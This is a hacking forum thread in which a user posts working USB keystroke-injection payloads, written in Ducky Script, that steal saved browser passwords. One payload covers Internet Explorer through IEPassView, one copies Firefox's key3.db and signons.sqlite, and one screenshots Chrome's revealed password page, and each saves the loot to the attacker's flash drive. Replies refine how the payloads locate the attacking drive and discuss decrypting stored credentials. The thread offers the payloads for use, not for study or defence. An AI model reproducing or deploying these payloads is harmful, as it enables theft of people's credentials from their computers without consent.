Jump to content

[Payload] Browser Password Payloads


mrt0mat0
 Share

Recommended Posts

So, I didn't see any examples of this, so I tried my best to get some basic ones down. Now, I only tested this on two systems and they seem to work. the timing for some might need to be tweaked. The biggest issue is that each browser uses different methods, so I made one for each...

files on flash drive: iepv.exe, evac.txt

Internet Explorer 9

This is actually the biggest cheat, as I just used iepassview but it's very portable so with my twin duck, i just threw it on there and it worked like a dream, except it takes like 10 seconds to run...

DEFAULTDELAY 50
DELAY 4000
GUI m
DELAY 200
CTRL ESC
STRING cmd
ENTER
DELAY 200
STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: ) 
ENTER
DELAY 200
STRING iepv.exe
ENTER
DELAY 10000
CTRL s
DELAY 200
STRING ie_passes.txt
ENTER
DELAY 1000
ALT F4
DELAY 200
STRING exit
ENTER

Firefox

this copies two files over key3 and signon. once you have them you can just drop them in a profile and go to the passwords section in firefox

DEFAULTDELAY 50
DELAY 3000
GUI m
DELAY 200
CTRL ESC
STRING cmd
ENTER
DELAY 200
STRING cd %userprofile%
ENTER
DELAY 200
STRING copy AppData\Roaming\Mozilla\Firefox\Profiles\
TAB
STRING \key3.db key3.db
ENTER
DELAY 200
STRING copy AppData\Roaming\Mozilla\Firefox\Profiles\
TAB
STRING \signons.sqlite signons.sqlite
ENTER
DELAY 200
STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: exit: ) 
ENTER
STRING move %userprofile%\key3.db key3.db
ENTER
DELAY 200
STRING move %userprofile%\signons.sqlite signons.sqlite
ENTER
STRING exit
ENTER

Chrome 24

I went to the passwords page, switched all the passwords on manually and screen capped it. The biggest flaw with this one is the password amount. this sample runs 8 passwords. if there are less you have a chance of randomly changing something. if there are more, you don't get all the ones available, which isn't always that big of a deal. this was only tested in chrome 24.0 so it may be different depending on the version.

DEFAULTDELAY 50
DELAY 3000
GUI m
DELAY 200
CTRL ESC
STRING chrome
ENTER
DELAY 1000
ESCAPE
DELAY 500
ALT SPACE
STRING x
DELAY 200
CTRL l
STRING chrome://settings/passwords
ENTER
DELAY 200
TAB
TAB
TAB
SHIFT TAB
SPACE
TAB
TAB
TAB
SHIFT TAB
SPACE
TAB
TAB
TAB
SHIFT TAB
SPACE
TAB
TAB
TAB
SHIFT TAB
SPACE
TAB
TAB
TAB
SHIFT TAB
SPACE
TAB
TAB
TAB
SHIFT TAB
SPACE
TAB
TAB
TAB
SHIFT TAB
SPACE
TAB
TAB
TAB
SHIFT TAB
ALT PRINTSCREEN
ALT F4
DELAY 400
GUI r
STRING mspaint
ENTER
DELAY 1000
CTRL v
DELAY 300
CTRL s
DELAY 300
STRING %userprofile%\chrome.png
ENTER
DELAY 300
ALT f
STRING x
DELAY 300
CTRL ESC
STRING cmd
ENTER
DELAY 300
STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: ) 
ENTER
DELAY 300
STRING move %userprofile%\chrome.png chrome.png
ENTER
DELAY 300
STRING exit
ENTER

look forward to feedback and improvements

Edited by smacks
Link to comment
Share on other sites

Love it so far. cant wait to put through its paces. Thought about grabbing some of this through the registry, but this seems more straightforward.

i know ie keeps the files in registry, but they're encrypted. i was going to look up the commands to decrypt to make it a pure "HID" attack, but I got distracted with other things. also, chrome has files you can pull but i'm not 100% on which ones and how i'd decrypt those as well. I know it's possible though

Link to comment
Share on other sites

Midnight snake showed me an improvement to the command line drive finding code;

J:\>for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d

J:\>echo %myd%
J:

This was part of what one of his firmware versions would automatically type in. So instead of using my for loop, we can use this loop which looks for a volume labeled "DUCKY". This means we don't need the text file on the root of the drive anymore.

Link to comment
Share on other sites

Midnight snake showed me an improvement to the command line drive finding code;
J:\>for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d

J:\>echo %myd%
J:

This was part of what one of his firmware versions would automatically type in. So instead of using my for loop, we can use this loop which looks for a volume labeled "DUCKY". This means we don't need the text file on the root of the drive anymore.

Just remember to label the sdcard to "DUCKY" for this to work.....

their not labelled by default (if they are its usually some pseudo-random code eg "23AF-3DDE")

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...